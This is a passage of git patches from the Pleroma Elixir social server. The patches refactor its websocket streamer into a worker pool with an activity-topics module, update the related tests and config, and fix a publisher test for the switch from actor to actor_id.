"postgrex": {:hex, :postgrex, "0.14.3", "5754dee2fdf6e9e508cbf49ab138df964278700b764177e8f3871e658b345a1e", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
"prometheus": {:hex, :prometheus, "4.4.1", "1e96073b3ed7788053768fea779cbc896ddc3bdd9ba60687f2ad50b252ac87d6", [:mix, :rebar3], [], "hexpm"},
"prometheus_ecto": {:hex, :prometheus_ecto, "1.4.1", "6c768ea9654de871e5b32fab2eac348467b3021604ebebbcbd8bcbe806a65ed5", [:mix], [{:ecto, "~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
diff --git a/test/activity/ir/topics_test.exs b/test/activity/ir/topics_test.exs
deleted file mode 100644
index e75f83586..000000000
--- a/test/activity/ir/topics_test.exs
+++ /dev/null
@@ -1,141 +0,0 @@
-defmodule Pleroma.Activity.Ir.TopicsTest do
- use Pleroma.DataCase
-
- alias Pleroma.Activity
- alias Pleroma.Activity.Ir.Topics
- alias Pleroma.Object
-
- require Pleroma.Constants
-
- describe "poll answer" do
- test "produce no topics" do
- activity = %Activity{object: %Object{data: %{"type" => "Answer"}}}
-
- assert [] == Topics.get_activity_topics(activity)
- end
- end
-
- describe "non poll answer" do
- test "always add user and list topics" do
- activity = %Activity{object: %Object{data: %{"type" => "FooBar"}}}
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "user")
- assert Enum.member?(topics, "list")
- end
- end
-
- describe "public visibility" do
- setup do
- activity = %Activity{
- object: %Object{data: %{"type" => "Note"}},
- data: %{"to" => [Pleroma.Constants.as_public()]}
- }
-
- {:ok, activity: activity}
- end
-
- test "produces public topic", %{activity: activity} do
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "public")
- end
-
- test "local action produces public:local topic", %{activity: activity} do
- activity = %{activity | local: true}
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "public:local")
- end
-
- test "non-local action does not produce public:local topic", %{activity: activity} do
- activity = %{activity | local: false}
- topics = Topics.get_activity_topics(activity)
-
- refute Enum.member?(topics, "public:local")
- end
- end
-
- describe "public visibility create events" do
- setup do
- activity = %Activity{
- object: %Object{data: %{"type" => "Create", "attachment" => []}},
- data: %{"to" => [Pleroma.Constants.as_public()]}
- }
-
- {:ok, activity: activity}
- end
-
- test "with no attachments doesn't produce public:media topics", %{activity: activity} do
- topics = Topics.get_activity_topics(activity)
-
- refute Enum.member?(topics, "public:media")
- refute Enum.member?(topics, "public:local:media")
- end
-
- test "converts tags to hash tags", %{activity: %{object: %{data: data} = object} = activity} do
- tagged_data = Map.put(data, "tag", ["foo", "bar"])
- activity = %{activity | object: %{object | data: tagged_data}}
-
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "hashtag:foo")
- assert Enum.member?(topics, "hashtag:bar")
- end
-
- test "only converts strinngs to hash tags", %{
- activity: %{object: %{data: data} = object} = activity
- } do
- tagged_data = Map.put(data, "tag", [2])
- activity = %{activity | object: %{object | data: tagged_data}}
-
- topics = Topics.get_activity_topics(activity)
-
- refute Enum.member?(topics, "hashtag:2")
- end
- end
-
- describe "public visibility create events with attachments" do
- setup do
- activity = %Activity{
- object: %Object{data: %{"type" => "Create", "attachment" => ["foo"]}},
- data: %{"to" => [Pleroma.Constants.as_public()]}
- }
-
- {:ok, activity: activity}
- end
-
- test "produce public:media topics", %{activity: activity} do
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "public:media")
- end
-
- test "local produces public:local:media topics", %{activity: activity} do
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "public:local:media")
- end
-
- test "non-local doesn't produce public:local:media topics", %{activity: activity} do
- activity = %{activity | local: false}
-
- topics = Topics.get_activity_topics(activity)
-
- refute Enum.member?(topics, "public:local:media")
- end
- end
-
- describe "non-public visibility" do
- test "produces direct topic" do
- activity = %Activity{object: %Object{data: %{"type" => "Note"}}, data: %{"to" => []}}
- topics = Topics.get_activity_topics(activity)
-
- assert Enum.member?(topics, "direct")
- refute Enum.member?(topics, "public")
- refute Enum.member?(topics, "public:local")
- refute Enum.member?(topics, "public:media")
- refute Enum.member?(topics, "public:local:media")
- end
- end
-end
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index c04262808..63bf73412 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -11,6 +11,7 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
alias Pleroma.Integration.WebsocketClient
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.OAuth
+ alias Pleroma.Web.Streamer
@path Pleroma.Web.Endpoint.url()
|> URI.parse()
@@ -18,6 +19,16 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
|> Map.put(:path, "/api/v1/streaming")
|> URI.to_string()
+ setup do
+ GenServer.start(Streamer, %{}, name: Streamer)
+
+ on_exit(fn ->
+ if pid = Process.whereis(Streamer) do
+ Process.exit(pid, :kill)
+ end
+ end)
+ end
+
def start_socket(qs \\ nil, headers \\ []) do
path =
case qs do
@@ -42,14 +53,12 @@ test "requires authentication and a valid token for protected streams" do
end)
end
- @tag needs_streamer: true
test "allows public streams without authentication" do
assert {:ok, _} = start_socket("?stream=public")
assert {:ok, _} = start_socket("?stream=public:local")
assert {:ok, _} = start_socket("?stream=hashtag&tag=lain")
end
- @tag needs_streamer: true
test "receives well formatted events" do
user = insert(:user)
{:ok, _} = start_socket("?stream=public")
@@ -94,7 +103,6 @@ test "accepts valid tokens", state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{state.token.token}")
end
- @tag needs_streamer: true
test "accepts the 'user' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{token.token}")
@@ -103,7 +111,6 @@ test "accepts the 'user' stream", %{token: token} = _state do
end) =~ ":badarg"
end
- @tag needs_streamer: true
test "accepts the 'user:notification' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user:notification&access_token=#{token.token}")
@@ -112,7 +119,6 @@ test "accepts the 'user:notification' stream", %{token: token} = _state do
end) =~ ":badarg"
end
- @tag needs_streamer: true
test "accepts valid token on Sec-WebSocket-Protocol header", %{token: token} do
assert {:ok, _} = start_socket("?stream=user", [{"Sec-WebSocket-Protocol", token.token}])
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 3d2f9a8fc..3be9db09b 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -69,7 +69,16 @@ test "does not create a notification for subscribed users if status is a reply"
end
describe "create_notification" do
- @tag needs_streamer: true
+ setup do
+ GenServer.start(Streamer, %{}, name: Streamer)
+
+ on_exit(fn ->
+ if pid = Process.whereis(Streamer) do
+ Process.exit(pid, :kill)
+ end
+ end)
+ end
+
test "it creates a notification for user and send to the 'user' and the 'user:notification' stream" do
user = insert(:user)
task = Task.async(fn -> assert_receive {:text, _}, 4_000 end)
diff --git a/test/support/conn_case.ex b/test/support/conn_case.ex
index b39c70677..ec5892ff5 100644
--- a/test/support/conn_case.ex
+++ b/test/support/conn_case.ex
@@ -40,10 +40,6 @@ defmodule Pleroma.Web.ConnCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
- if tags[:needs_streamer] do
- start_supervised(Pleroma.Web.Streamer.supervisor())
- end
-
{:ok, conn: Phoenix.ConnTest.build_conn()}
end
end
diff --git a/test/support/data_case.ex b/test/support/data_case.ex
index 17fa15214..f3d98e7e3 100644
--- a/test/support/data_case.ex
+++ b/test/support/data_case.ex
@@ -39,10 +39,6 @@ defmodule Pleroma.DataCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
- if tags[:needs_streamer] do
- start_supervised(Pleroma.Web.Streamer.supervisor())
- end
-
:ok
end
diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs
index 4100108a5..d0118fefa 100644
--- a/test/web/activity_pub/activity_pub_test.exs
+++ b/test/web/activity_pub/activity_pub_test.exs
@@ -38,7 +38,9 @@ test "it streams them out" do
stream: fn _, _ -> nil end do
ActivityPub.stream_out_participations(conversation.participations)
- assert called(Pleroma.Web.Streamer.stream("participation", participations))
+ Enum.each(participations, fn participation ->
+ assert called(Pleroma.Web.Streamer.stream("participation", participation))
+ end)
end
end
end
diff --git a/test/web/streamer/ping_test.exs b/test/web/streamer/ping_test.exs
deleted file mode 100644
index 3d52c00e4..000000000
--- a/test/web/streamer/ping_test.exs
+++ /dev/null
@@ -1,36 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.PingTest do
- use Pleroma.DataCase
-
- import Pleroma.Factory
- alias Pleroma.Web.Streamer
-
- setup do
- start_supervised({Streamer.supervisor(), [ping_interval: 30]})
-
- :ok
- end
-
- describe "sockets" do
- setup do
- user = insert(:user)
- {:ok, %{user: user}}
- end
-
- test "it sends pings", %{user: user} do
- task =
- Task.async(fn ->
- assert_receive {:text, received_event}, 40
- assert_receive {:text, received_event}, 40
- assert_receive {:text, received_event}, 40
- end)
-
- Streamer.add_socket("public", %{transport_pid: task.pid, assigns: %{user: user}})
-
- Task.await(task)
- end
- end
-end
diff --git a/test/web/streamer/state_test.exs b/test/web/streamer/state_test.exs
deleted file mode 100644
index d1aeac541..000000000
--- a/test/web/streamer/state_test.exs
+++ /dev/null
@@ -1,54 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.StateTest do
- use Pleroma.DataCase
-
- import Pleroma.Factory
- alias Pleroma.Web.Streamer
- alias Pleroma.Web.Streamer.StreamerSocket
-
- @moduletag needs_streamer: true
-
- describe "sockets" do
- setup do
- user = insert(:user)
- user2 = insert(:user)
- {:ok, %{user: user, user2: user2}}
- end
-
- test "it can add a socket", %{user: user} do
- Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
-
- assert(%{"public" => [%StreamerSocket{transport_pid: 1}]} = Streamer.get_sockets())
- end
-
- test "it can add multiple sockets per user", %{user: user} do
- Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
- Streamer.add_socket("public", %{transport_pid: 2, assigns: %{user: user}})
-
- assert(
- %{
- "public" => [
- %StreamerSocket{transport_pid: 2},
- %StreamerSocket{transport_pid: 1}
- ]
- } = Streamer.get_sockets()
- )
- end
-
- test "it will not add a duplicate socket", %{user: user} do
- Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
- Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
-
- assert(
- %{
- "activity" => [
- %StreamerSocket{transport_pid: 1}
- ]
- } = Streamer.get_sockets()
- )
- end
- end
-end
diff --git a/test/web/streamer/streamer_test.exs b/test/web/streamer_test.exs
similarity index 86%
rename from test/web/streamer/streamer_test.exs
rename to test/web/streamer_test.exs
index 88847e20f..96fa7645f 100644
--- a/test/web/streamer/streamer_test.exs
+++ b/test/web/streamer_test.exs
@@ -5,20 +5,24 @@
defmodule Pleroma.Web.StreamerTest do
use Pleroma.DataCase
- import Pleroma.Factory
-
alias Pleroma.List
alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Streamer
- alias Pleroma.Web.Streamer.StreamerSocket
- alias Pleroma.Web.Streamer.Worker
+ import Pleroma.Factory
- @moduletag needs_streamer: true
clear_config_all([:instance, :skip_thread_containment])
describe "user streams" do
setup do
+ GenServer.start(Streamer, %{}, name: Streamer)
+
+ on_exit(fn ->
+ if pid = Process.whereis(Streamer) do
+ Process.exit(pid, :kill)
+ end
+ end)
+
user = insert(:user)
notify = insert(:notification, user: user, activity: build(:note_activity))
{:ok, %{user: user, notify: notify}}
@@ -121,9 +125,11 @@ test "it sends to public" do
assert_receive {:text, _}, 4_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user
+ assigns: %{
+ user: user
+ }
}
{:ok, activity} = CommonAPI.post(other_user, %{"status" => "Test"})
@@ -132,7 +138,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
@@ -149,9 +155,11 @@ test "it sends to public" do
assert received_event == expected_event
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user
+ assigns: %{
+ user: user
+ }
}
{:ok, activity} = CommonAPI.delete(activity.id, other_user)
@@ -160,7 +168,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -181,9 +189,9 @@ test "it doesn't send to user if recipients invalid and thread containment is en
)
task = Task.async(fn -> refute_receive {:text, _}, 1_000 end)
- fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
+ fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
topics = %{"public" => [fake_socket]}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -203,9 +211,9 @@ test "it sends message if recipients invalid and thread containment is disabled"
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
+ fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
topics = %{"public" => [fake_socket]}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -225,9 +233,9 @@ test "it sends message if recipients invalid and thread containment is enabled b
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
+ fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
topics = %{"public" => [fake_socket]}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -243,9 +251,11 @@ test "it doesn't send to blocked users" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user
+ assigns: %{
+ user: user
+ }
}
{:ok, activity} = CommonAPI.post(blocked_user, %{"status" => "Test"})
@@ -254,7 +264,7 @@ test "it doesn't send to blocked users" do
"public" => [fake_socket]
}
- Worker.push_to_socket(topics, "public", activity)
+ Streamer.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -274,9 +284,11 @@ test "it doesn't send unwanted DMs to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user_a
+ assigns: %{
+ user: user_a
+ }
}
{:ok, activity} =
@@ -289,7 +301,7 @@ test "it doesn't send unwanted DMs to list" do
"list:#{list.id}" => [fake_socket]
}
- Worker.handle_call({:stream, "list", activity}, self(), topics)
+ Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
Task.await(task)
end
@@ -306,9 +318,11 @@ test "it doesn't send unwanted private posts to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user_a
+ assigns: %{
+ user: user_a
+ }
}
{:ok, activity} =
@@ -321,12 +335,12 @@ test "it doesn't send unwanted private posts to list" do
"list:#{list.id}" => [fake_socket]
}
- Worker.handle_call({:stream, "list", activity}, self(), topics)
+ Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
Task.await(task)
end
- test "it sends wanted private posts to list" do
+ test "it send wanted private posts to list" do
user_a = insert(:user)
user_b = insert(:user)
@@ -340,9 +354,11 @@ test "it sends wanted private posts to list" do
assert_receive {:text, _}, 1_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user_a
+ assigns: %{
+ user: user_a
+ }
}
{:ok, activity} =
@@ -351,12 +367,11 @@ test "it sends wanted private posts to list" do
"visibility" => "private"
})
- Streamer.add_socket(
- "list:#{list.id}",
- fake_socket
- )
+ topics = %{
+ "list:#{list.id}" => [fake_socket]
+ }
- Worker.handle_call({:stream, "list", activity}, self(), %{})
+ Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
Task.await(task)
end
@@ -372,9 +387,11 @@ test "it doesn't send muted reblogs" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %StreamerSocket{
+ fake_socket = %{
transport_pid: task.pid,
- user: user1
+ assigns: %{
+ user: user1
+ }
}
{:ok, create_activity} = CommonAPI.post(user3, %{"status" => "I'm kawen"})
@@ -384,7 +401,7 @@ test "it doesn't send muted reblogs" do
"public" => [fake_socket]
}
- Worker.push_to_socket(topics, "public", announce_activity)
+ Streamer.push_to_socket(topics, "public", announce_activity)
Task.await(task)
end
@@ -400,8 +417,6 @@ test "it doesn't send posts from muted threads" do
task = Task.async(fn -> refute_receive {:text, _}, 4_000 end)
- Process.sleep(4000)
-
Streamer.add_socket(
"user",
%{transport_pid: task.pid, assigns: %{user: user2}}
@@ -413,6 +428,14 @@ test "it doesn't send posts from muted threads" do
describe "direct streams" do
setup do
+ GenServer.start(Streamer, %{}, name: Streamer)
+
+ on_exit(fn ->
+ if pid = Process.whereis(Streamer) do
+ Process.exit(pid, :kill)
+ end
+ end)
+
:ok
end
@@ -457,8 +480,6 @@ test "it doesn't send conversation update to the 'direct' streamj when the last
refute_receive {:text, _}, 4_000
end)
- Process.sleep(1000)
-
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
@@ -500,8 +521,6 @@ test "it sends conversation update to the 'direct' stream when a message is dele
assert last_status["id"] == to_string(create_activity.id)
end)
- Process.sleep(1000)
-
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
From e8120944d8c016a1aa8fcefe34b1f0cc9089ea4f Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Mon, 16 Sep 2019 13:23:06 +0300
Subject: [PATCH 080/272] Fix signed fetch inclusion publisher test
Oban branch changed `actor` to `actor_id` and this test was not adjusted for that
---
test/web/activity_pub/publisher_test.exs | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/test/web/activity_pub/publisher_test.exs b/test/web/activity_pub/publisher_test.exs
index c7d1d05aa..df03b4008 100644
--- a/test/web/activity_pub/publisher_test.exs
+++ b/test/web/activity_pub/publisher_test.exs
@@ -321,7 +321,7 @@ test "it returns inbox for messages involving single recipients in total" do
assert called(
Pleroma.Web.Federator.Publisher.enqueue_one(Publisher, %{
inbox: "https://domain.com/users/nick1/inbox",
- actor: actor,
+ actor_id: actor.id,
id: delete.data["id"]
})
)
@@ -329,7 +329,7 @@ test "it returns inbox for messages involving single recipients in total" do
assert called(
Pleroma.Web.Federator.Publisher.enqueue_one(Publisher, %{
inbox: "https://domain2.com/users/nick1/inbox",
- actor: actor,
+ actor_id: actor.id,
id: delete.data["id"]
})
)
From 96816ceaa25c21cec7677e75dcddd7ffb42d83c3 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Mon, 16 Sep 2019 17:03:37 +0700
Subject: [PATCH 081/272] Revert "Merge branch 'revert-4fabf83a' into
'develop'"
This reverts commit fe7fd331263007e0fb2877ef7370a09a9704da36, reversing
changes made to 4fabf83ad01352442906d79187aeab4c777f4df8.
---
.gitignore | 4 +
config/config.exs | 4 +
lib/pleroma/activity/ir/topics.ex | 63 ++++
lib/pleroma/application.ex | 2 +-
lib/pleroma/notification.ex | 6 +-
lib/pleroma/web/activity_pub/activity_pub.ex | 48 +--
.../web/mastodon_api/websocket_handler.ex | 7 +-
lib/pleroma/web/streamer.ex | 318 ------------------
lib/pleroma/web/streamer/ping.ex | 33 ++
lib/pleroma/web/streamer/state.ex | 68 ++++
lib/pleroma/web/streamer/streamer.ex | 55 +++
lib/pleroma/web/streamer/streamer_socket.ex | 31 ++
lib/pleroma/web/streamer/supervisor.ex | 33 ++
lib/pleroma/web/streamer/worker.ex | 220 ++++++++++++
lib/pleroma/web/views/streamer_view.ex | 66 ++++
mix.exs | 1 +
mix.lock | 1 +
test/activity/ir/topics_test.exs | 141 ++++++++
test/integration/mastodon_websocket_test.exs | 16 +-
test/notification_test.exs | 11 +-
test/support/conn_case.ex | 4 +
test/support/data_case.ex | 4 +
test/web/activity_pub/activity_pub_test.exs | 4 +-
test/web/streamer/ping_test.exs | 36 ++
test/web/streamer/state_test.exs | 54 +++
test/web/{ => streamer}/streamer_test.exs | 105 +++---
26 files changed, 888 insertions(+), 447 deletions(-)
create mode 100644 lib/pleroma/activity/ir/topics.ex
delete mode 100644 lib/pleroma/web/streamer.ex
create mode 100644 lib/pleroma/web/streamer/ping.ex
create mode 100644 lib/pleroma/web/streamer/state.ex
create mode 100644 lib/pleroma/web/streamer/streamer.ex
create mode 100644 lib/pleroma/web/streamer/streamer_socket.ex
create mode 100644 lib/pleroma/web/streamer/supervisor.ex
create mode 100644 lib/pleroma/web/streamer/worker.ex
create mode 100644 lib/pleroma/web/views/streamer_view.ex
create mode 100644 test/activity/ir/topics_test.exs
create mode 100644 test/web/streamer/ping_test.exs
create mode 100644 test/web/streamer/state_test.exs
rename test/web/{ => streamer}/streamer_test.exs (86%)
diff --git a/.gitignore b/.gitignore
index 4e71a7df0..3b0c7d361 100644
--- a/.gitignore
+++ b/.gitignore
@@ -43,3 +43,7 @@ docs/generated_config.md
# Code test coverage
/cover
/Elixir.*.coverdata
+
+.idea
+pleroma.iml
+
diff --git a/config/config.exs b/config/config.exs
index ab6e00c98..b1b98af93 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -331,6 +331,10 @@
follow_handshake_timeout: 500,
sign_object_fetches: true
+config :pleroma, :streamer,
+ workers: 3,
+ overflow_workers: 2
+
config :pleroma, :user, deny_follow_blocked: true
config :pleroma, :mrf_normalize_markup, scrub_policy: Pleroma.HTML.Scrubber.Default
diff --git a/lib/pleroma/activity/ir/topics.ex b/lib/pleroma/activity/ir/topics.ex
new file mode 100644
index 000000000..010897abc
--- /dev/null
+++ b/lib/pleroma/activity/ir/topics.ex
@@ -0,0 +1,63 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Activity.Ir.Topics do
+ alias Pleroma.Object
+ alias Pleroma.Web.ActivityPub.Visibility
+
+ def get_activity_topics(activity) do
+ activity
+ |> Object.normalize()
+ |> generate_topics(activity)
+ |> List.flatten()
+ end
+
+ defp generate_topics(%{data: %{"type" => "Answer"}}, _) do
+ []
+ end
+
+ defp generate_topics(object, activity) do
+ ["user", "list"] ++ visibility_tags(object, activity)
+ end
+
+ defp visibility_tags(object, activity) do
+ case Visibility.get_visibility(activity) do
+ "public" ->
+ if activity.local do
+ ["public", "public:local"]
+ else
+ ["public"]
+ end
+ |> item_creation_tags(object, activity)
+
+ "direct" ->
+ ["direct"]
+
+ _ ->
+ []
+ end
+ end
+
+ defp item_creation_tags(tags, %{data: %{"type" => "Create"}} = object, activity) do
+ tags ++ hashtags_to_topics(object) ++ attachment_topics(object, activity)
+ end
+
+ defp item_creation_tags(tags, _, _) do
+ tags
+ end
+
+ defp hashtags_to_topics(%{data: %{"tag" => tags}}) do
+ tags
+ |> Enum.filter(&is_bitstring(&1))
+ |> Enum.map(fn tag -> "hashtag:" <> tag end)
+ end
+
+ defp hashtags_to_topics(_), do: []
+
+ defp attachment_topics(%{data: %{"attachment" => []}}, _act), do: []
+
+ defp attachment_topics(_object, %{local: true}), do: ["public:media", "public:local:media"]
+
+ defp attachment_topics(_object, _act), do: ["public:media"]
+end
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 49094704b..3b37ce630 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -141,7 +141,7 @@ defp oauth_cleanup_enabled?,
defp streamer_child(:test), do: []
defp streamer_child(_) do
- [Pleroma.Web.Streamer]
+ [Pleroma.Web.Streamer.supervisor()]
end
defp oauth_cleanup_child(true),
diff --git a/lib/pleroma/notification.ex b/lib/pleroma/notification.ex
index b7c880c51..8012389ac 100644
--- a/lib/pleroma/notification.ex
+++ b/lib/pleroma/notification.ex
@@ -210,8 +210,10 @@ def create_notification(%Activity{} = activity, %User{} = user) do
unless skip?(activity, user) do
notification = %Notification{user_id: user.id, activity: activity}
{:ok, notification} = Repo.insert(notification)
- Streamer.stream("user", notification)
- Streamer.stream("user:notification", notification)
+
+ ["user", "user:notification"]
+ |> Streamer.stream(notification)
+
Push.send(notification)
notification
end
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index 41f6a0f1f..bc5ae7fbf 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -4,6 +4,7 @@
defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.Activity
+ alias Pleroma.Activity.Ir.Topics
alias Pleroma.Config
alias Pleroma.Conversation
alias Pleroma.Notification
@@ -16,6 +17,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.User
alias Pleroma.Web.ActivityPub.MRF
alias Pleroma.Web.ActivityPub.Transmogrifier
+ alias Pleroma.Web.Streamer
alias Pleroma.Web.WebFinger
alias Pleroma.Workers.BackgroundWorker
@@ -187,9 +189,7 @@ def stream_out_participations(participations) do
participations
|> Repo.preload(:user)
- Enum.each(participations, fn participation ->
- Pleroma.Web.Streamer.stream("participation", participation)
- end)
+ Streamer.stream("participation", participations)
end
def stream_out_participations(%Object{data: %{"context" => context}}, user) do
@@ -208,41 +208,15 @@ def stream_out_participations(%Object{data: %{"context" => context}}, user) do
def stream_out_participations(_, _), do: :noop
- def stream_out(activity) do
- if activity.data["type"] in ["Create", "Announce", "Delete"] do
- object = Object.normalize(activity)
- # Do not stream out poll replies
- unless object.data["type"] == "Answer" do
- Pleroma.Web.Streamer.stream("user", activity)
- Pleroma.Web.Streamer.stream("list", activity)
+ def stream_out(%Activity{data: %{"type" => data_type}} = activity)
+ when data_type in ["Create", "Announce", "Delete"] do
+ activity
+ |> Topics.get_activity_topics()
+ |> Streamer.stream(activity)
+ end
- if get_visibility(activity) == "public" do
- Pleroma.Web.Streamer.stream("public", activity)
-
- if activity.local do
- Pleroma.Web.Streamer.stream("public:local", activity)
- end
-
- if activity.data["type"] in ["Create"] do
- object.data
- |> Map.get("tag", [])
- |> Enum.filter(fn tag -> is_bitstring(tag) end)
- |> Enum.each(fn tag -> Pleroma.Web.Streamer.stream("hashtag:" <> tag, activity) end)
-
- if object.data["attachment"] != [] do
- Pleroma.Web.Streamer.stream("public:media", activity)
-
- if activity.local do
- Pleroma.Web.Streamer.stream("public:local:media", activity)
- end
- end
- end
- else
- if get_visibility(activity) == "direct",
- do: Pleroma.Web.Streamer.stream("direct", activity)
- end
- end
- end
+ def stream_out(_activity) do
+ :noop
end
def create(%{to: to, actor: actor, context: context, object: object} = params, fake \\ false) do
diff --git a/lib/pleroma/web/mastodon_api/websocket_handler.ex b/lib/pleroma/web/mastodon_api/websocket_handler.ex
index dbd3542ea..3c26eb406 100644
--- a/lib/pleroma/web/mastodon_api/websocket_handler.ex
+++ b/lib/pleroma/web/mastodon_api/websocket_handler.ex
@@ -8,6 +8,7 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.OAuth.Token
+ alias Pleroma.Web.Streamer
@behaviour :cowboy_websocket
@@ -24,7 +25,7 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
]
@anonymous_streams ["public", "public:local", "hashtag"]
- # Handled by periodic keepalive in Pleroma.Web.Streamer.
+ # Handled by periodic keepalive in Pleroma.Web.Streamer.Ping.
@timeout :infinity
def init(%{qs: qs} = req, state) do
@@ -65,7 +66,7 @@ def websocket_info(:subscribe, state) do
}, topic #{state.topic}"
)
- Pleroma.Web.Streamer.add_socket(state.topic, streamer_socket(state))
+ Streamer.add_socket(state.topic, streamer_socket(state))
{:ok, state}
end
@@ -80,7 +81,7 @@ def terminate(reason, _req, state) do
}, topic #{state.topic || "?"}: #{inspect(reason)}"
)
- Pleroma.Web.Streamer.remove_socket(state.topic, streamer_socket(state))
+ Streamer.remove_socket(state.topic, streamer_socket(state))
:ok
end
diff --git a/lib/pleroma/web/streamer.ex b/lib/pleroma/web/streamer.ex
deleted file mode 100644
index 587c43f40..000000000
--- a/lib/pleroma/web/streamer.ex
+++ /dev/null
@@ -1,318 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.Streamer do
- use GenServer
- require Logger
- alias Pleroma.Activity
- alias Pleroma.Config
- alias Pleroma.Conversation.Participation
- alias Pleroma.Notification
- alias Pleroma.Object
- alias Pleroma.User
- alias Pleroma.Web.ActivityPub.ActivityPub
- alias Pleroma.Web.ActivityPub.Visibility
- alias Pleroma.Web.CommonAPI
